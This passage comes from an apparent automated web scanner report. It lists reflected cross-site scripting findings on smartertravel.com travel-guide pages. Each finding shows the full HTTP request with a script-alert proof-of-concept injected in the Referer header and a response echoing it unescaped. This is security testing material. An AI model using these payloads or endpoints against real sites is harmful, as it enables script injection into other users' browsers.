Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=fe426<script>alert(1)</script>a2398847bff

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:50:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:50:49 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:50:49 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:50:49 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_fe426%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Ba2398847bff%3A%3A%3A%3A%3A%3A1289685050%3A%3A%3A; expires=Thu, 18-Nov-2010 21:50:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=fe426<script>alert(1)</script>a2398847bff</p>
...[SNIP]...

2.104. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/greensboro-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8a139<script>alert(1)</script>c0cd1600811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/greensboro-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=8a139<script>alert(1)</script>c0cd1600811

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:55:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:56:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_8a139%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bc0cd1600811%3A%3A%3A%3A%3A%3A1289685391%3A%3A%3A; expires=Thu, 18-Nov-2010 21:56:31 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=8a139<script>alert(1)</script>c0cd1600811</p>
...[SNIP]...

2.105. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kansas-city-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1f9df<script>alert(1)</script>b91a1fd957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/kansas-city-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=1f9df<script>alert(1)</script>b91a1fd957

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:50:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:50:10 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:50:10 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:50:10 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_1f9df%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb91a1fd957%3A%3A%3A%3A%3A%3A1289685011%3A%3A%3A; expires=Thu, 18-Nov-2010 21:50:11 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=1f9df<script>alert(1)</script>b91a1fd957</p>
...[SNIP]...

2.106. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kissimmee-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload dff29<script>alert(1)</script>a13dbc64ba9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/kissimmee-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=dff29<script>alert(1)</script>a13dbc64ba9

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 22:01:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:01:47 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:01:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:01:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_dff29%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Ba13dbc64ba9%3A%3A%3A%3A%3A%3A1289685708%3A%3A%3A; expires=Thu, 18-Nov-2010 22:01:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=dff29<script>alert(1)</script>a13dbc64ba9</p>
...[SNIP]...

2.107. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/las-vegas-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 478de<script>alert(1)</script>952d695a779 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/las-vegas-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=478de<script>alert(1)</script>952d695a779

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:49:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:47 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:49:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_478de%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B952d695a779%3A%3A%3A%3A%3A%3A1289684988%3A%3A%3A; expires=Thu, 18-Nov-2010 21:49:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=478de<script>alert(1)</script>952d695a779</p>
...[SNIP]...

2.108. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/lexington-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 2d4af<script>alert(1)</script>38c8e902d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/lexington-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=2d4af<script>alert(1)</script>38c8e902d9

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 22:01:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:01:06 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:01:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:01:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_2d4af%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B38c8e902d9%3A%3A%3A%3A%3A%3A1289685667%3A%3A%3A; expires=Thu, 18-Nov-2010 22:01:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=2d4af<script>alert(1)</script>38c8e902d9</p>
...[SNIP]...

2.109. http://www.smartertravel.com/travel-guides/london-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/london-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 46c26<script>alert(1)</script>e1291b936dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/london-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=46c26<script>alert(1)</script>e1291b936dc

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:55:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:08 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:56:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_46c26%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be1291b936dc%3A%3A%3A%3A%3A%3A1289685369%3A%3A%3A; expires=Thu, 18-Nov-2010 21:56:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=46c26<script>alert(1)</script>e1291b936dc</p>
...[SNIP]...

2.110. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/louisville-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d5a38<script>alert(1)</script>d16eac1e5d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/louisville-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=d5a38<script>alert(1)</script>d16eac1e5d4

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:15 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_d5a38%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bd16eac1e5d4%3A%3A%3A%3A%3A%3A1289685136%3A%3A%3A; expires=Thu, 18-Nov-2010 21:52:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=d5a38<script>alert(1)</script>d16eac1e5d4</p>
...[SNIP]...

2.111. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
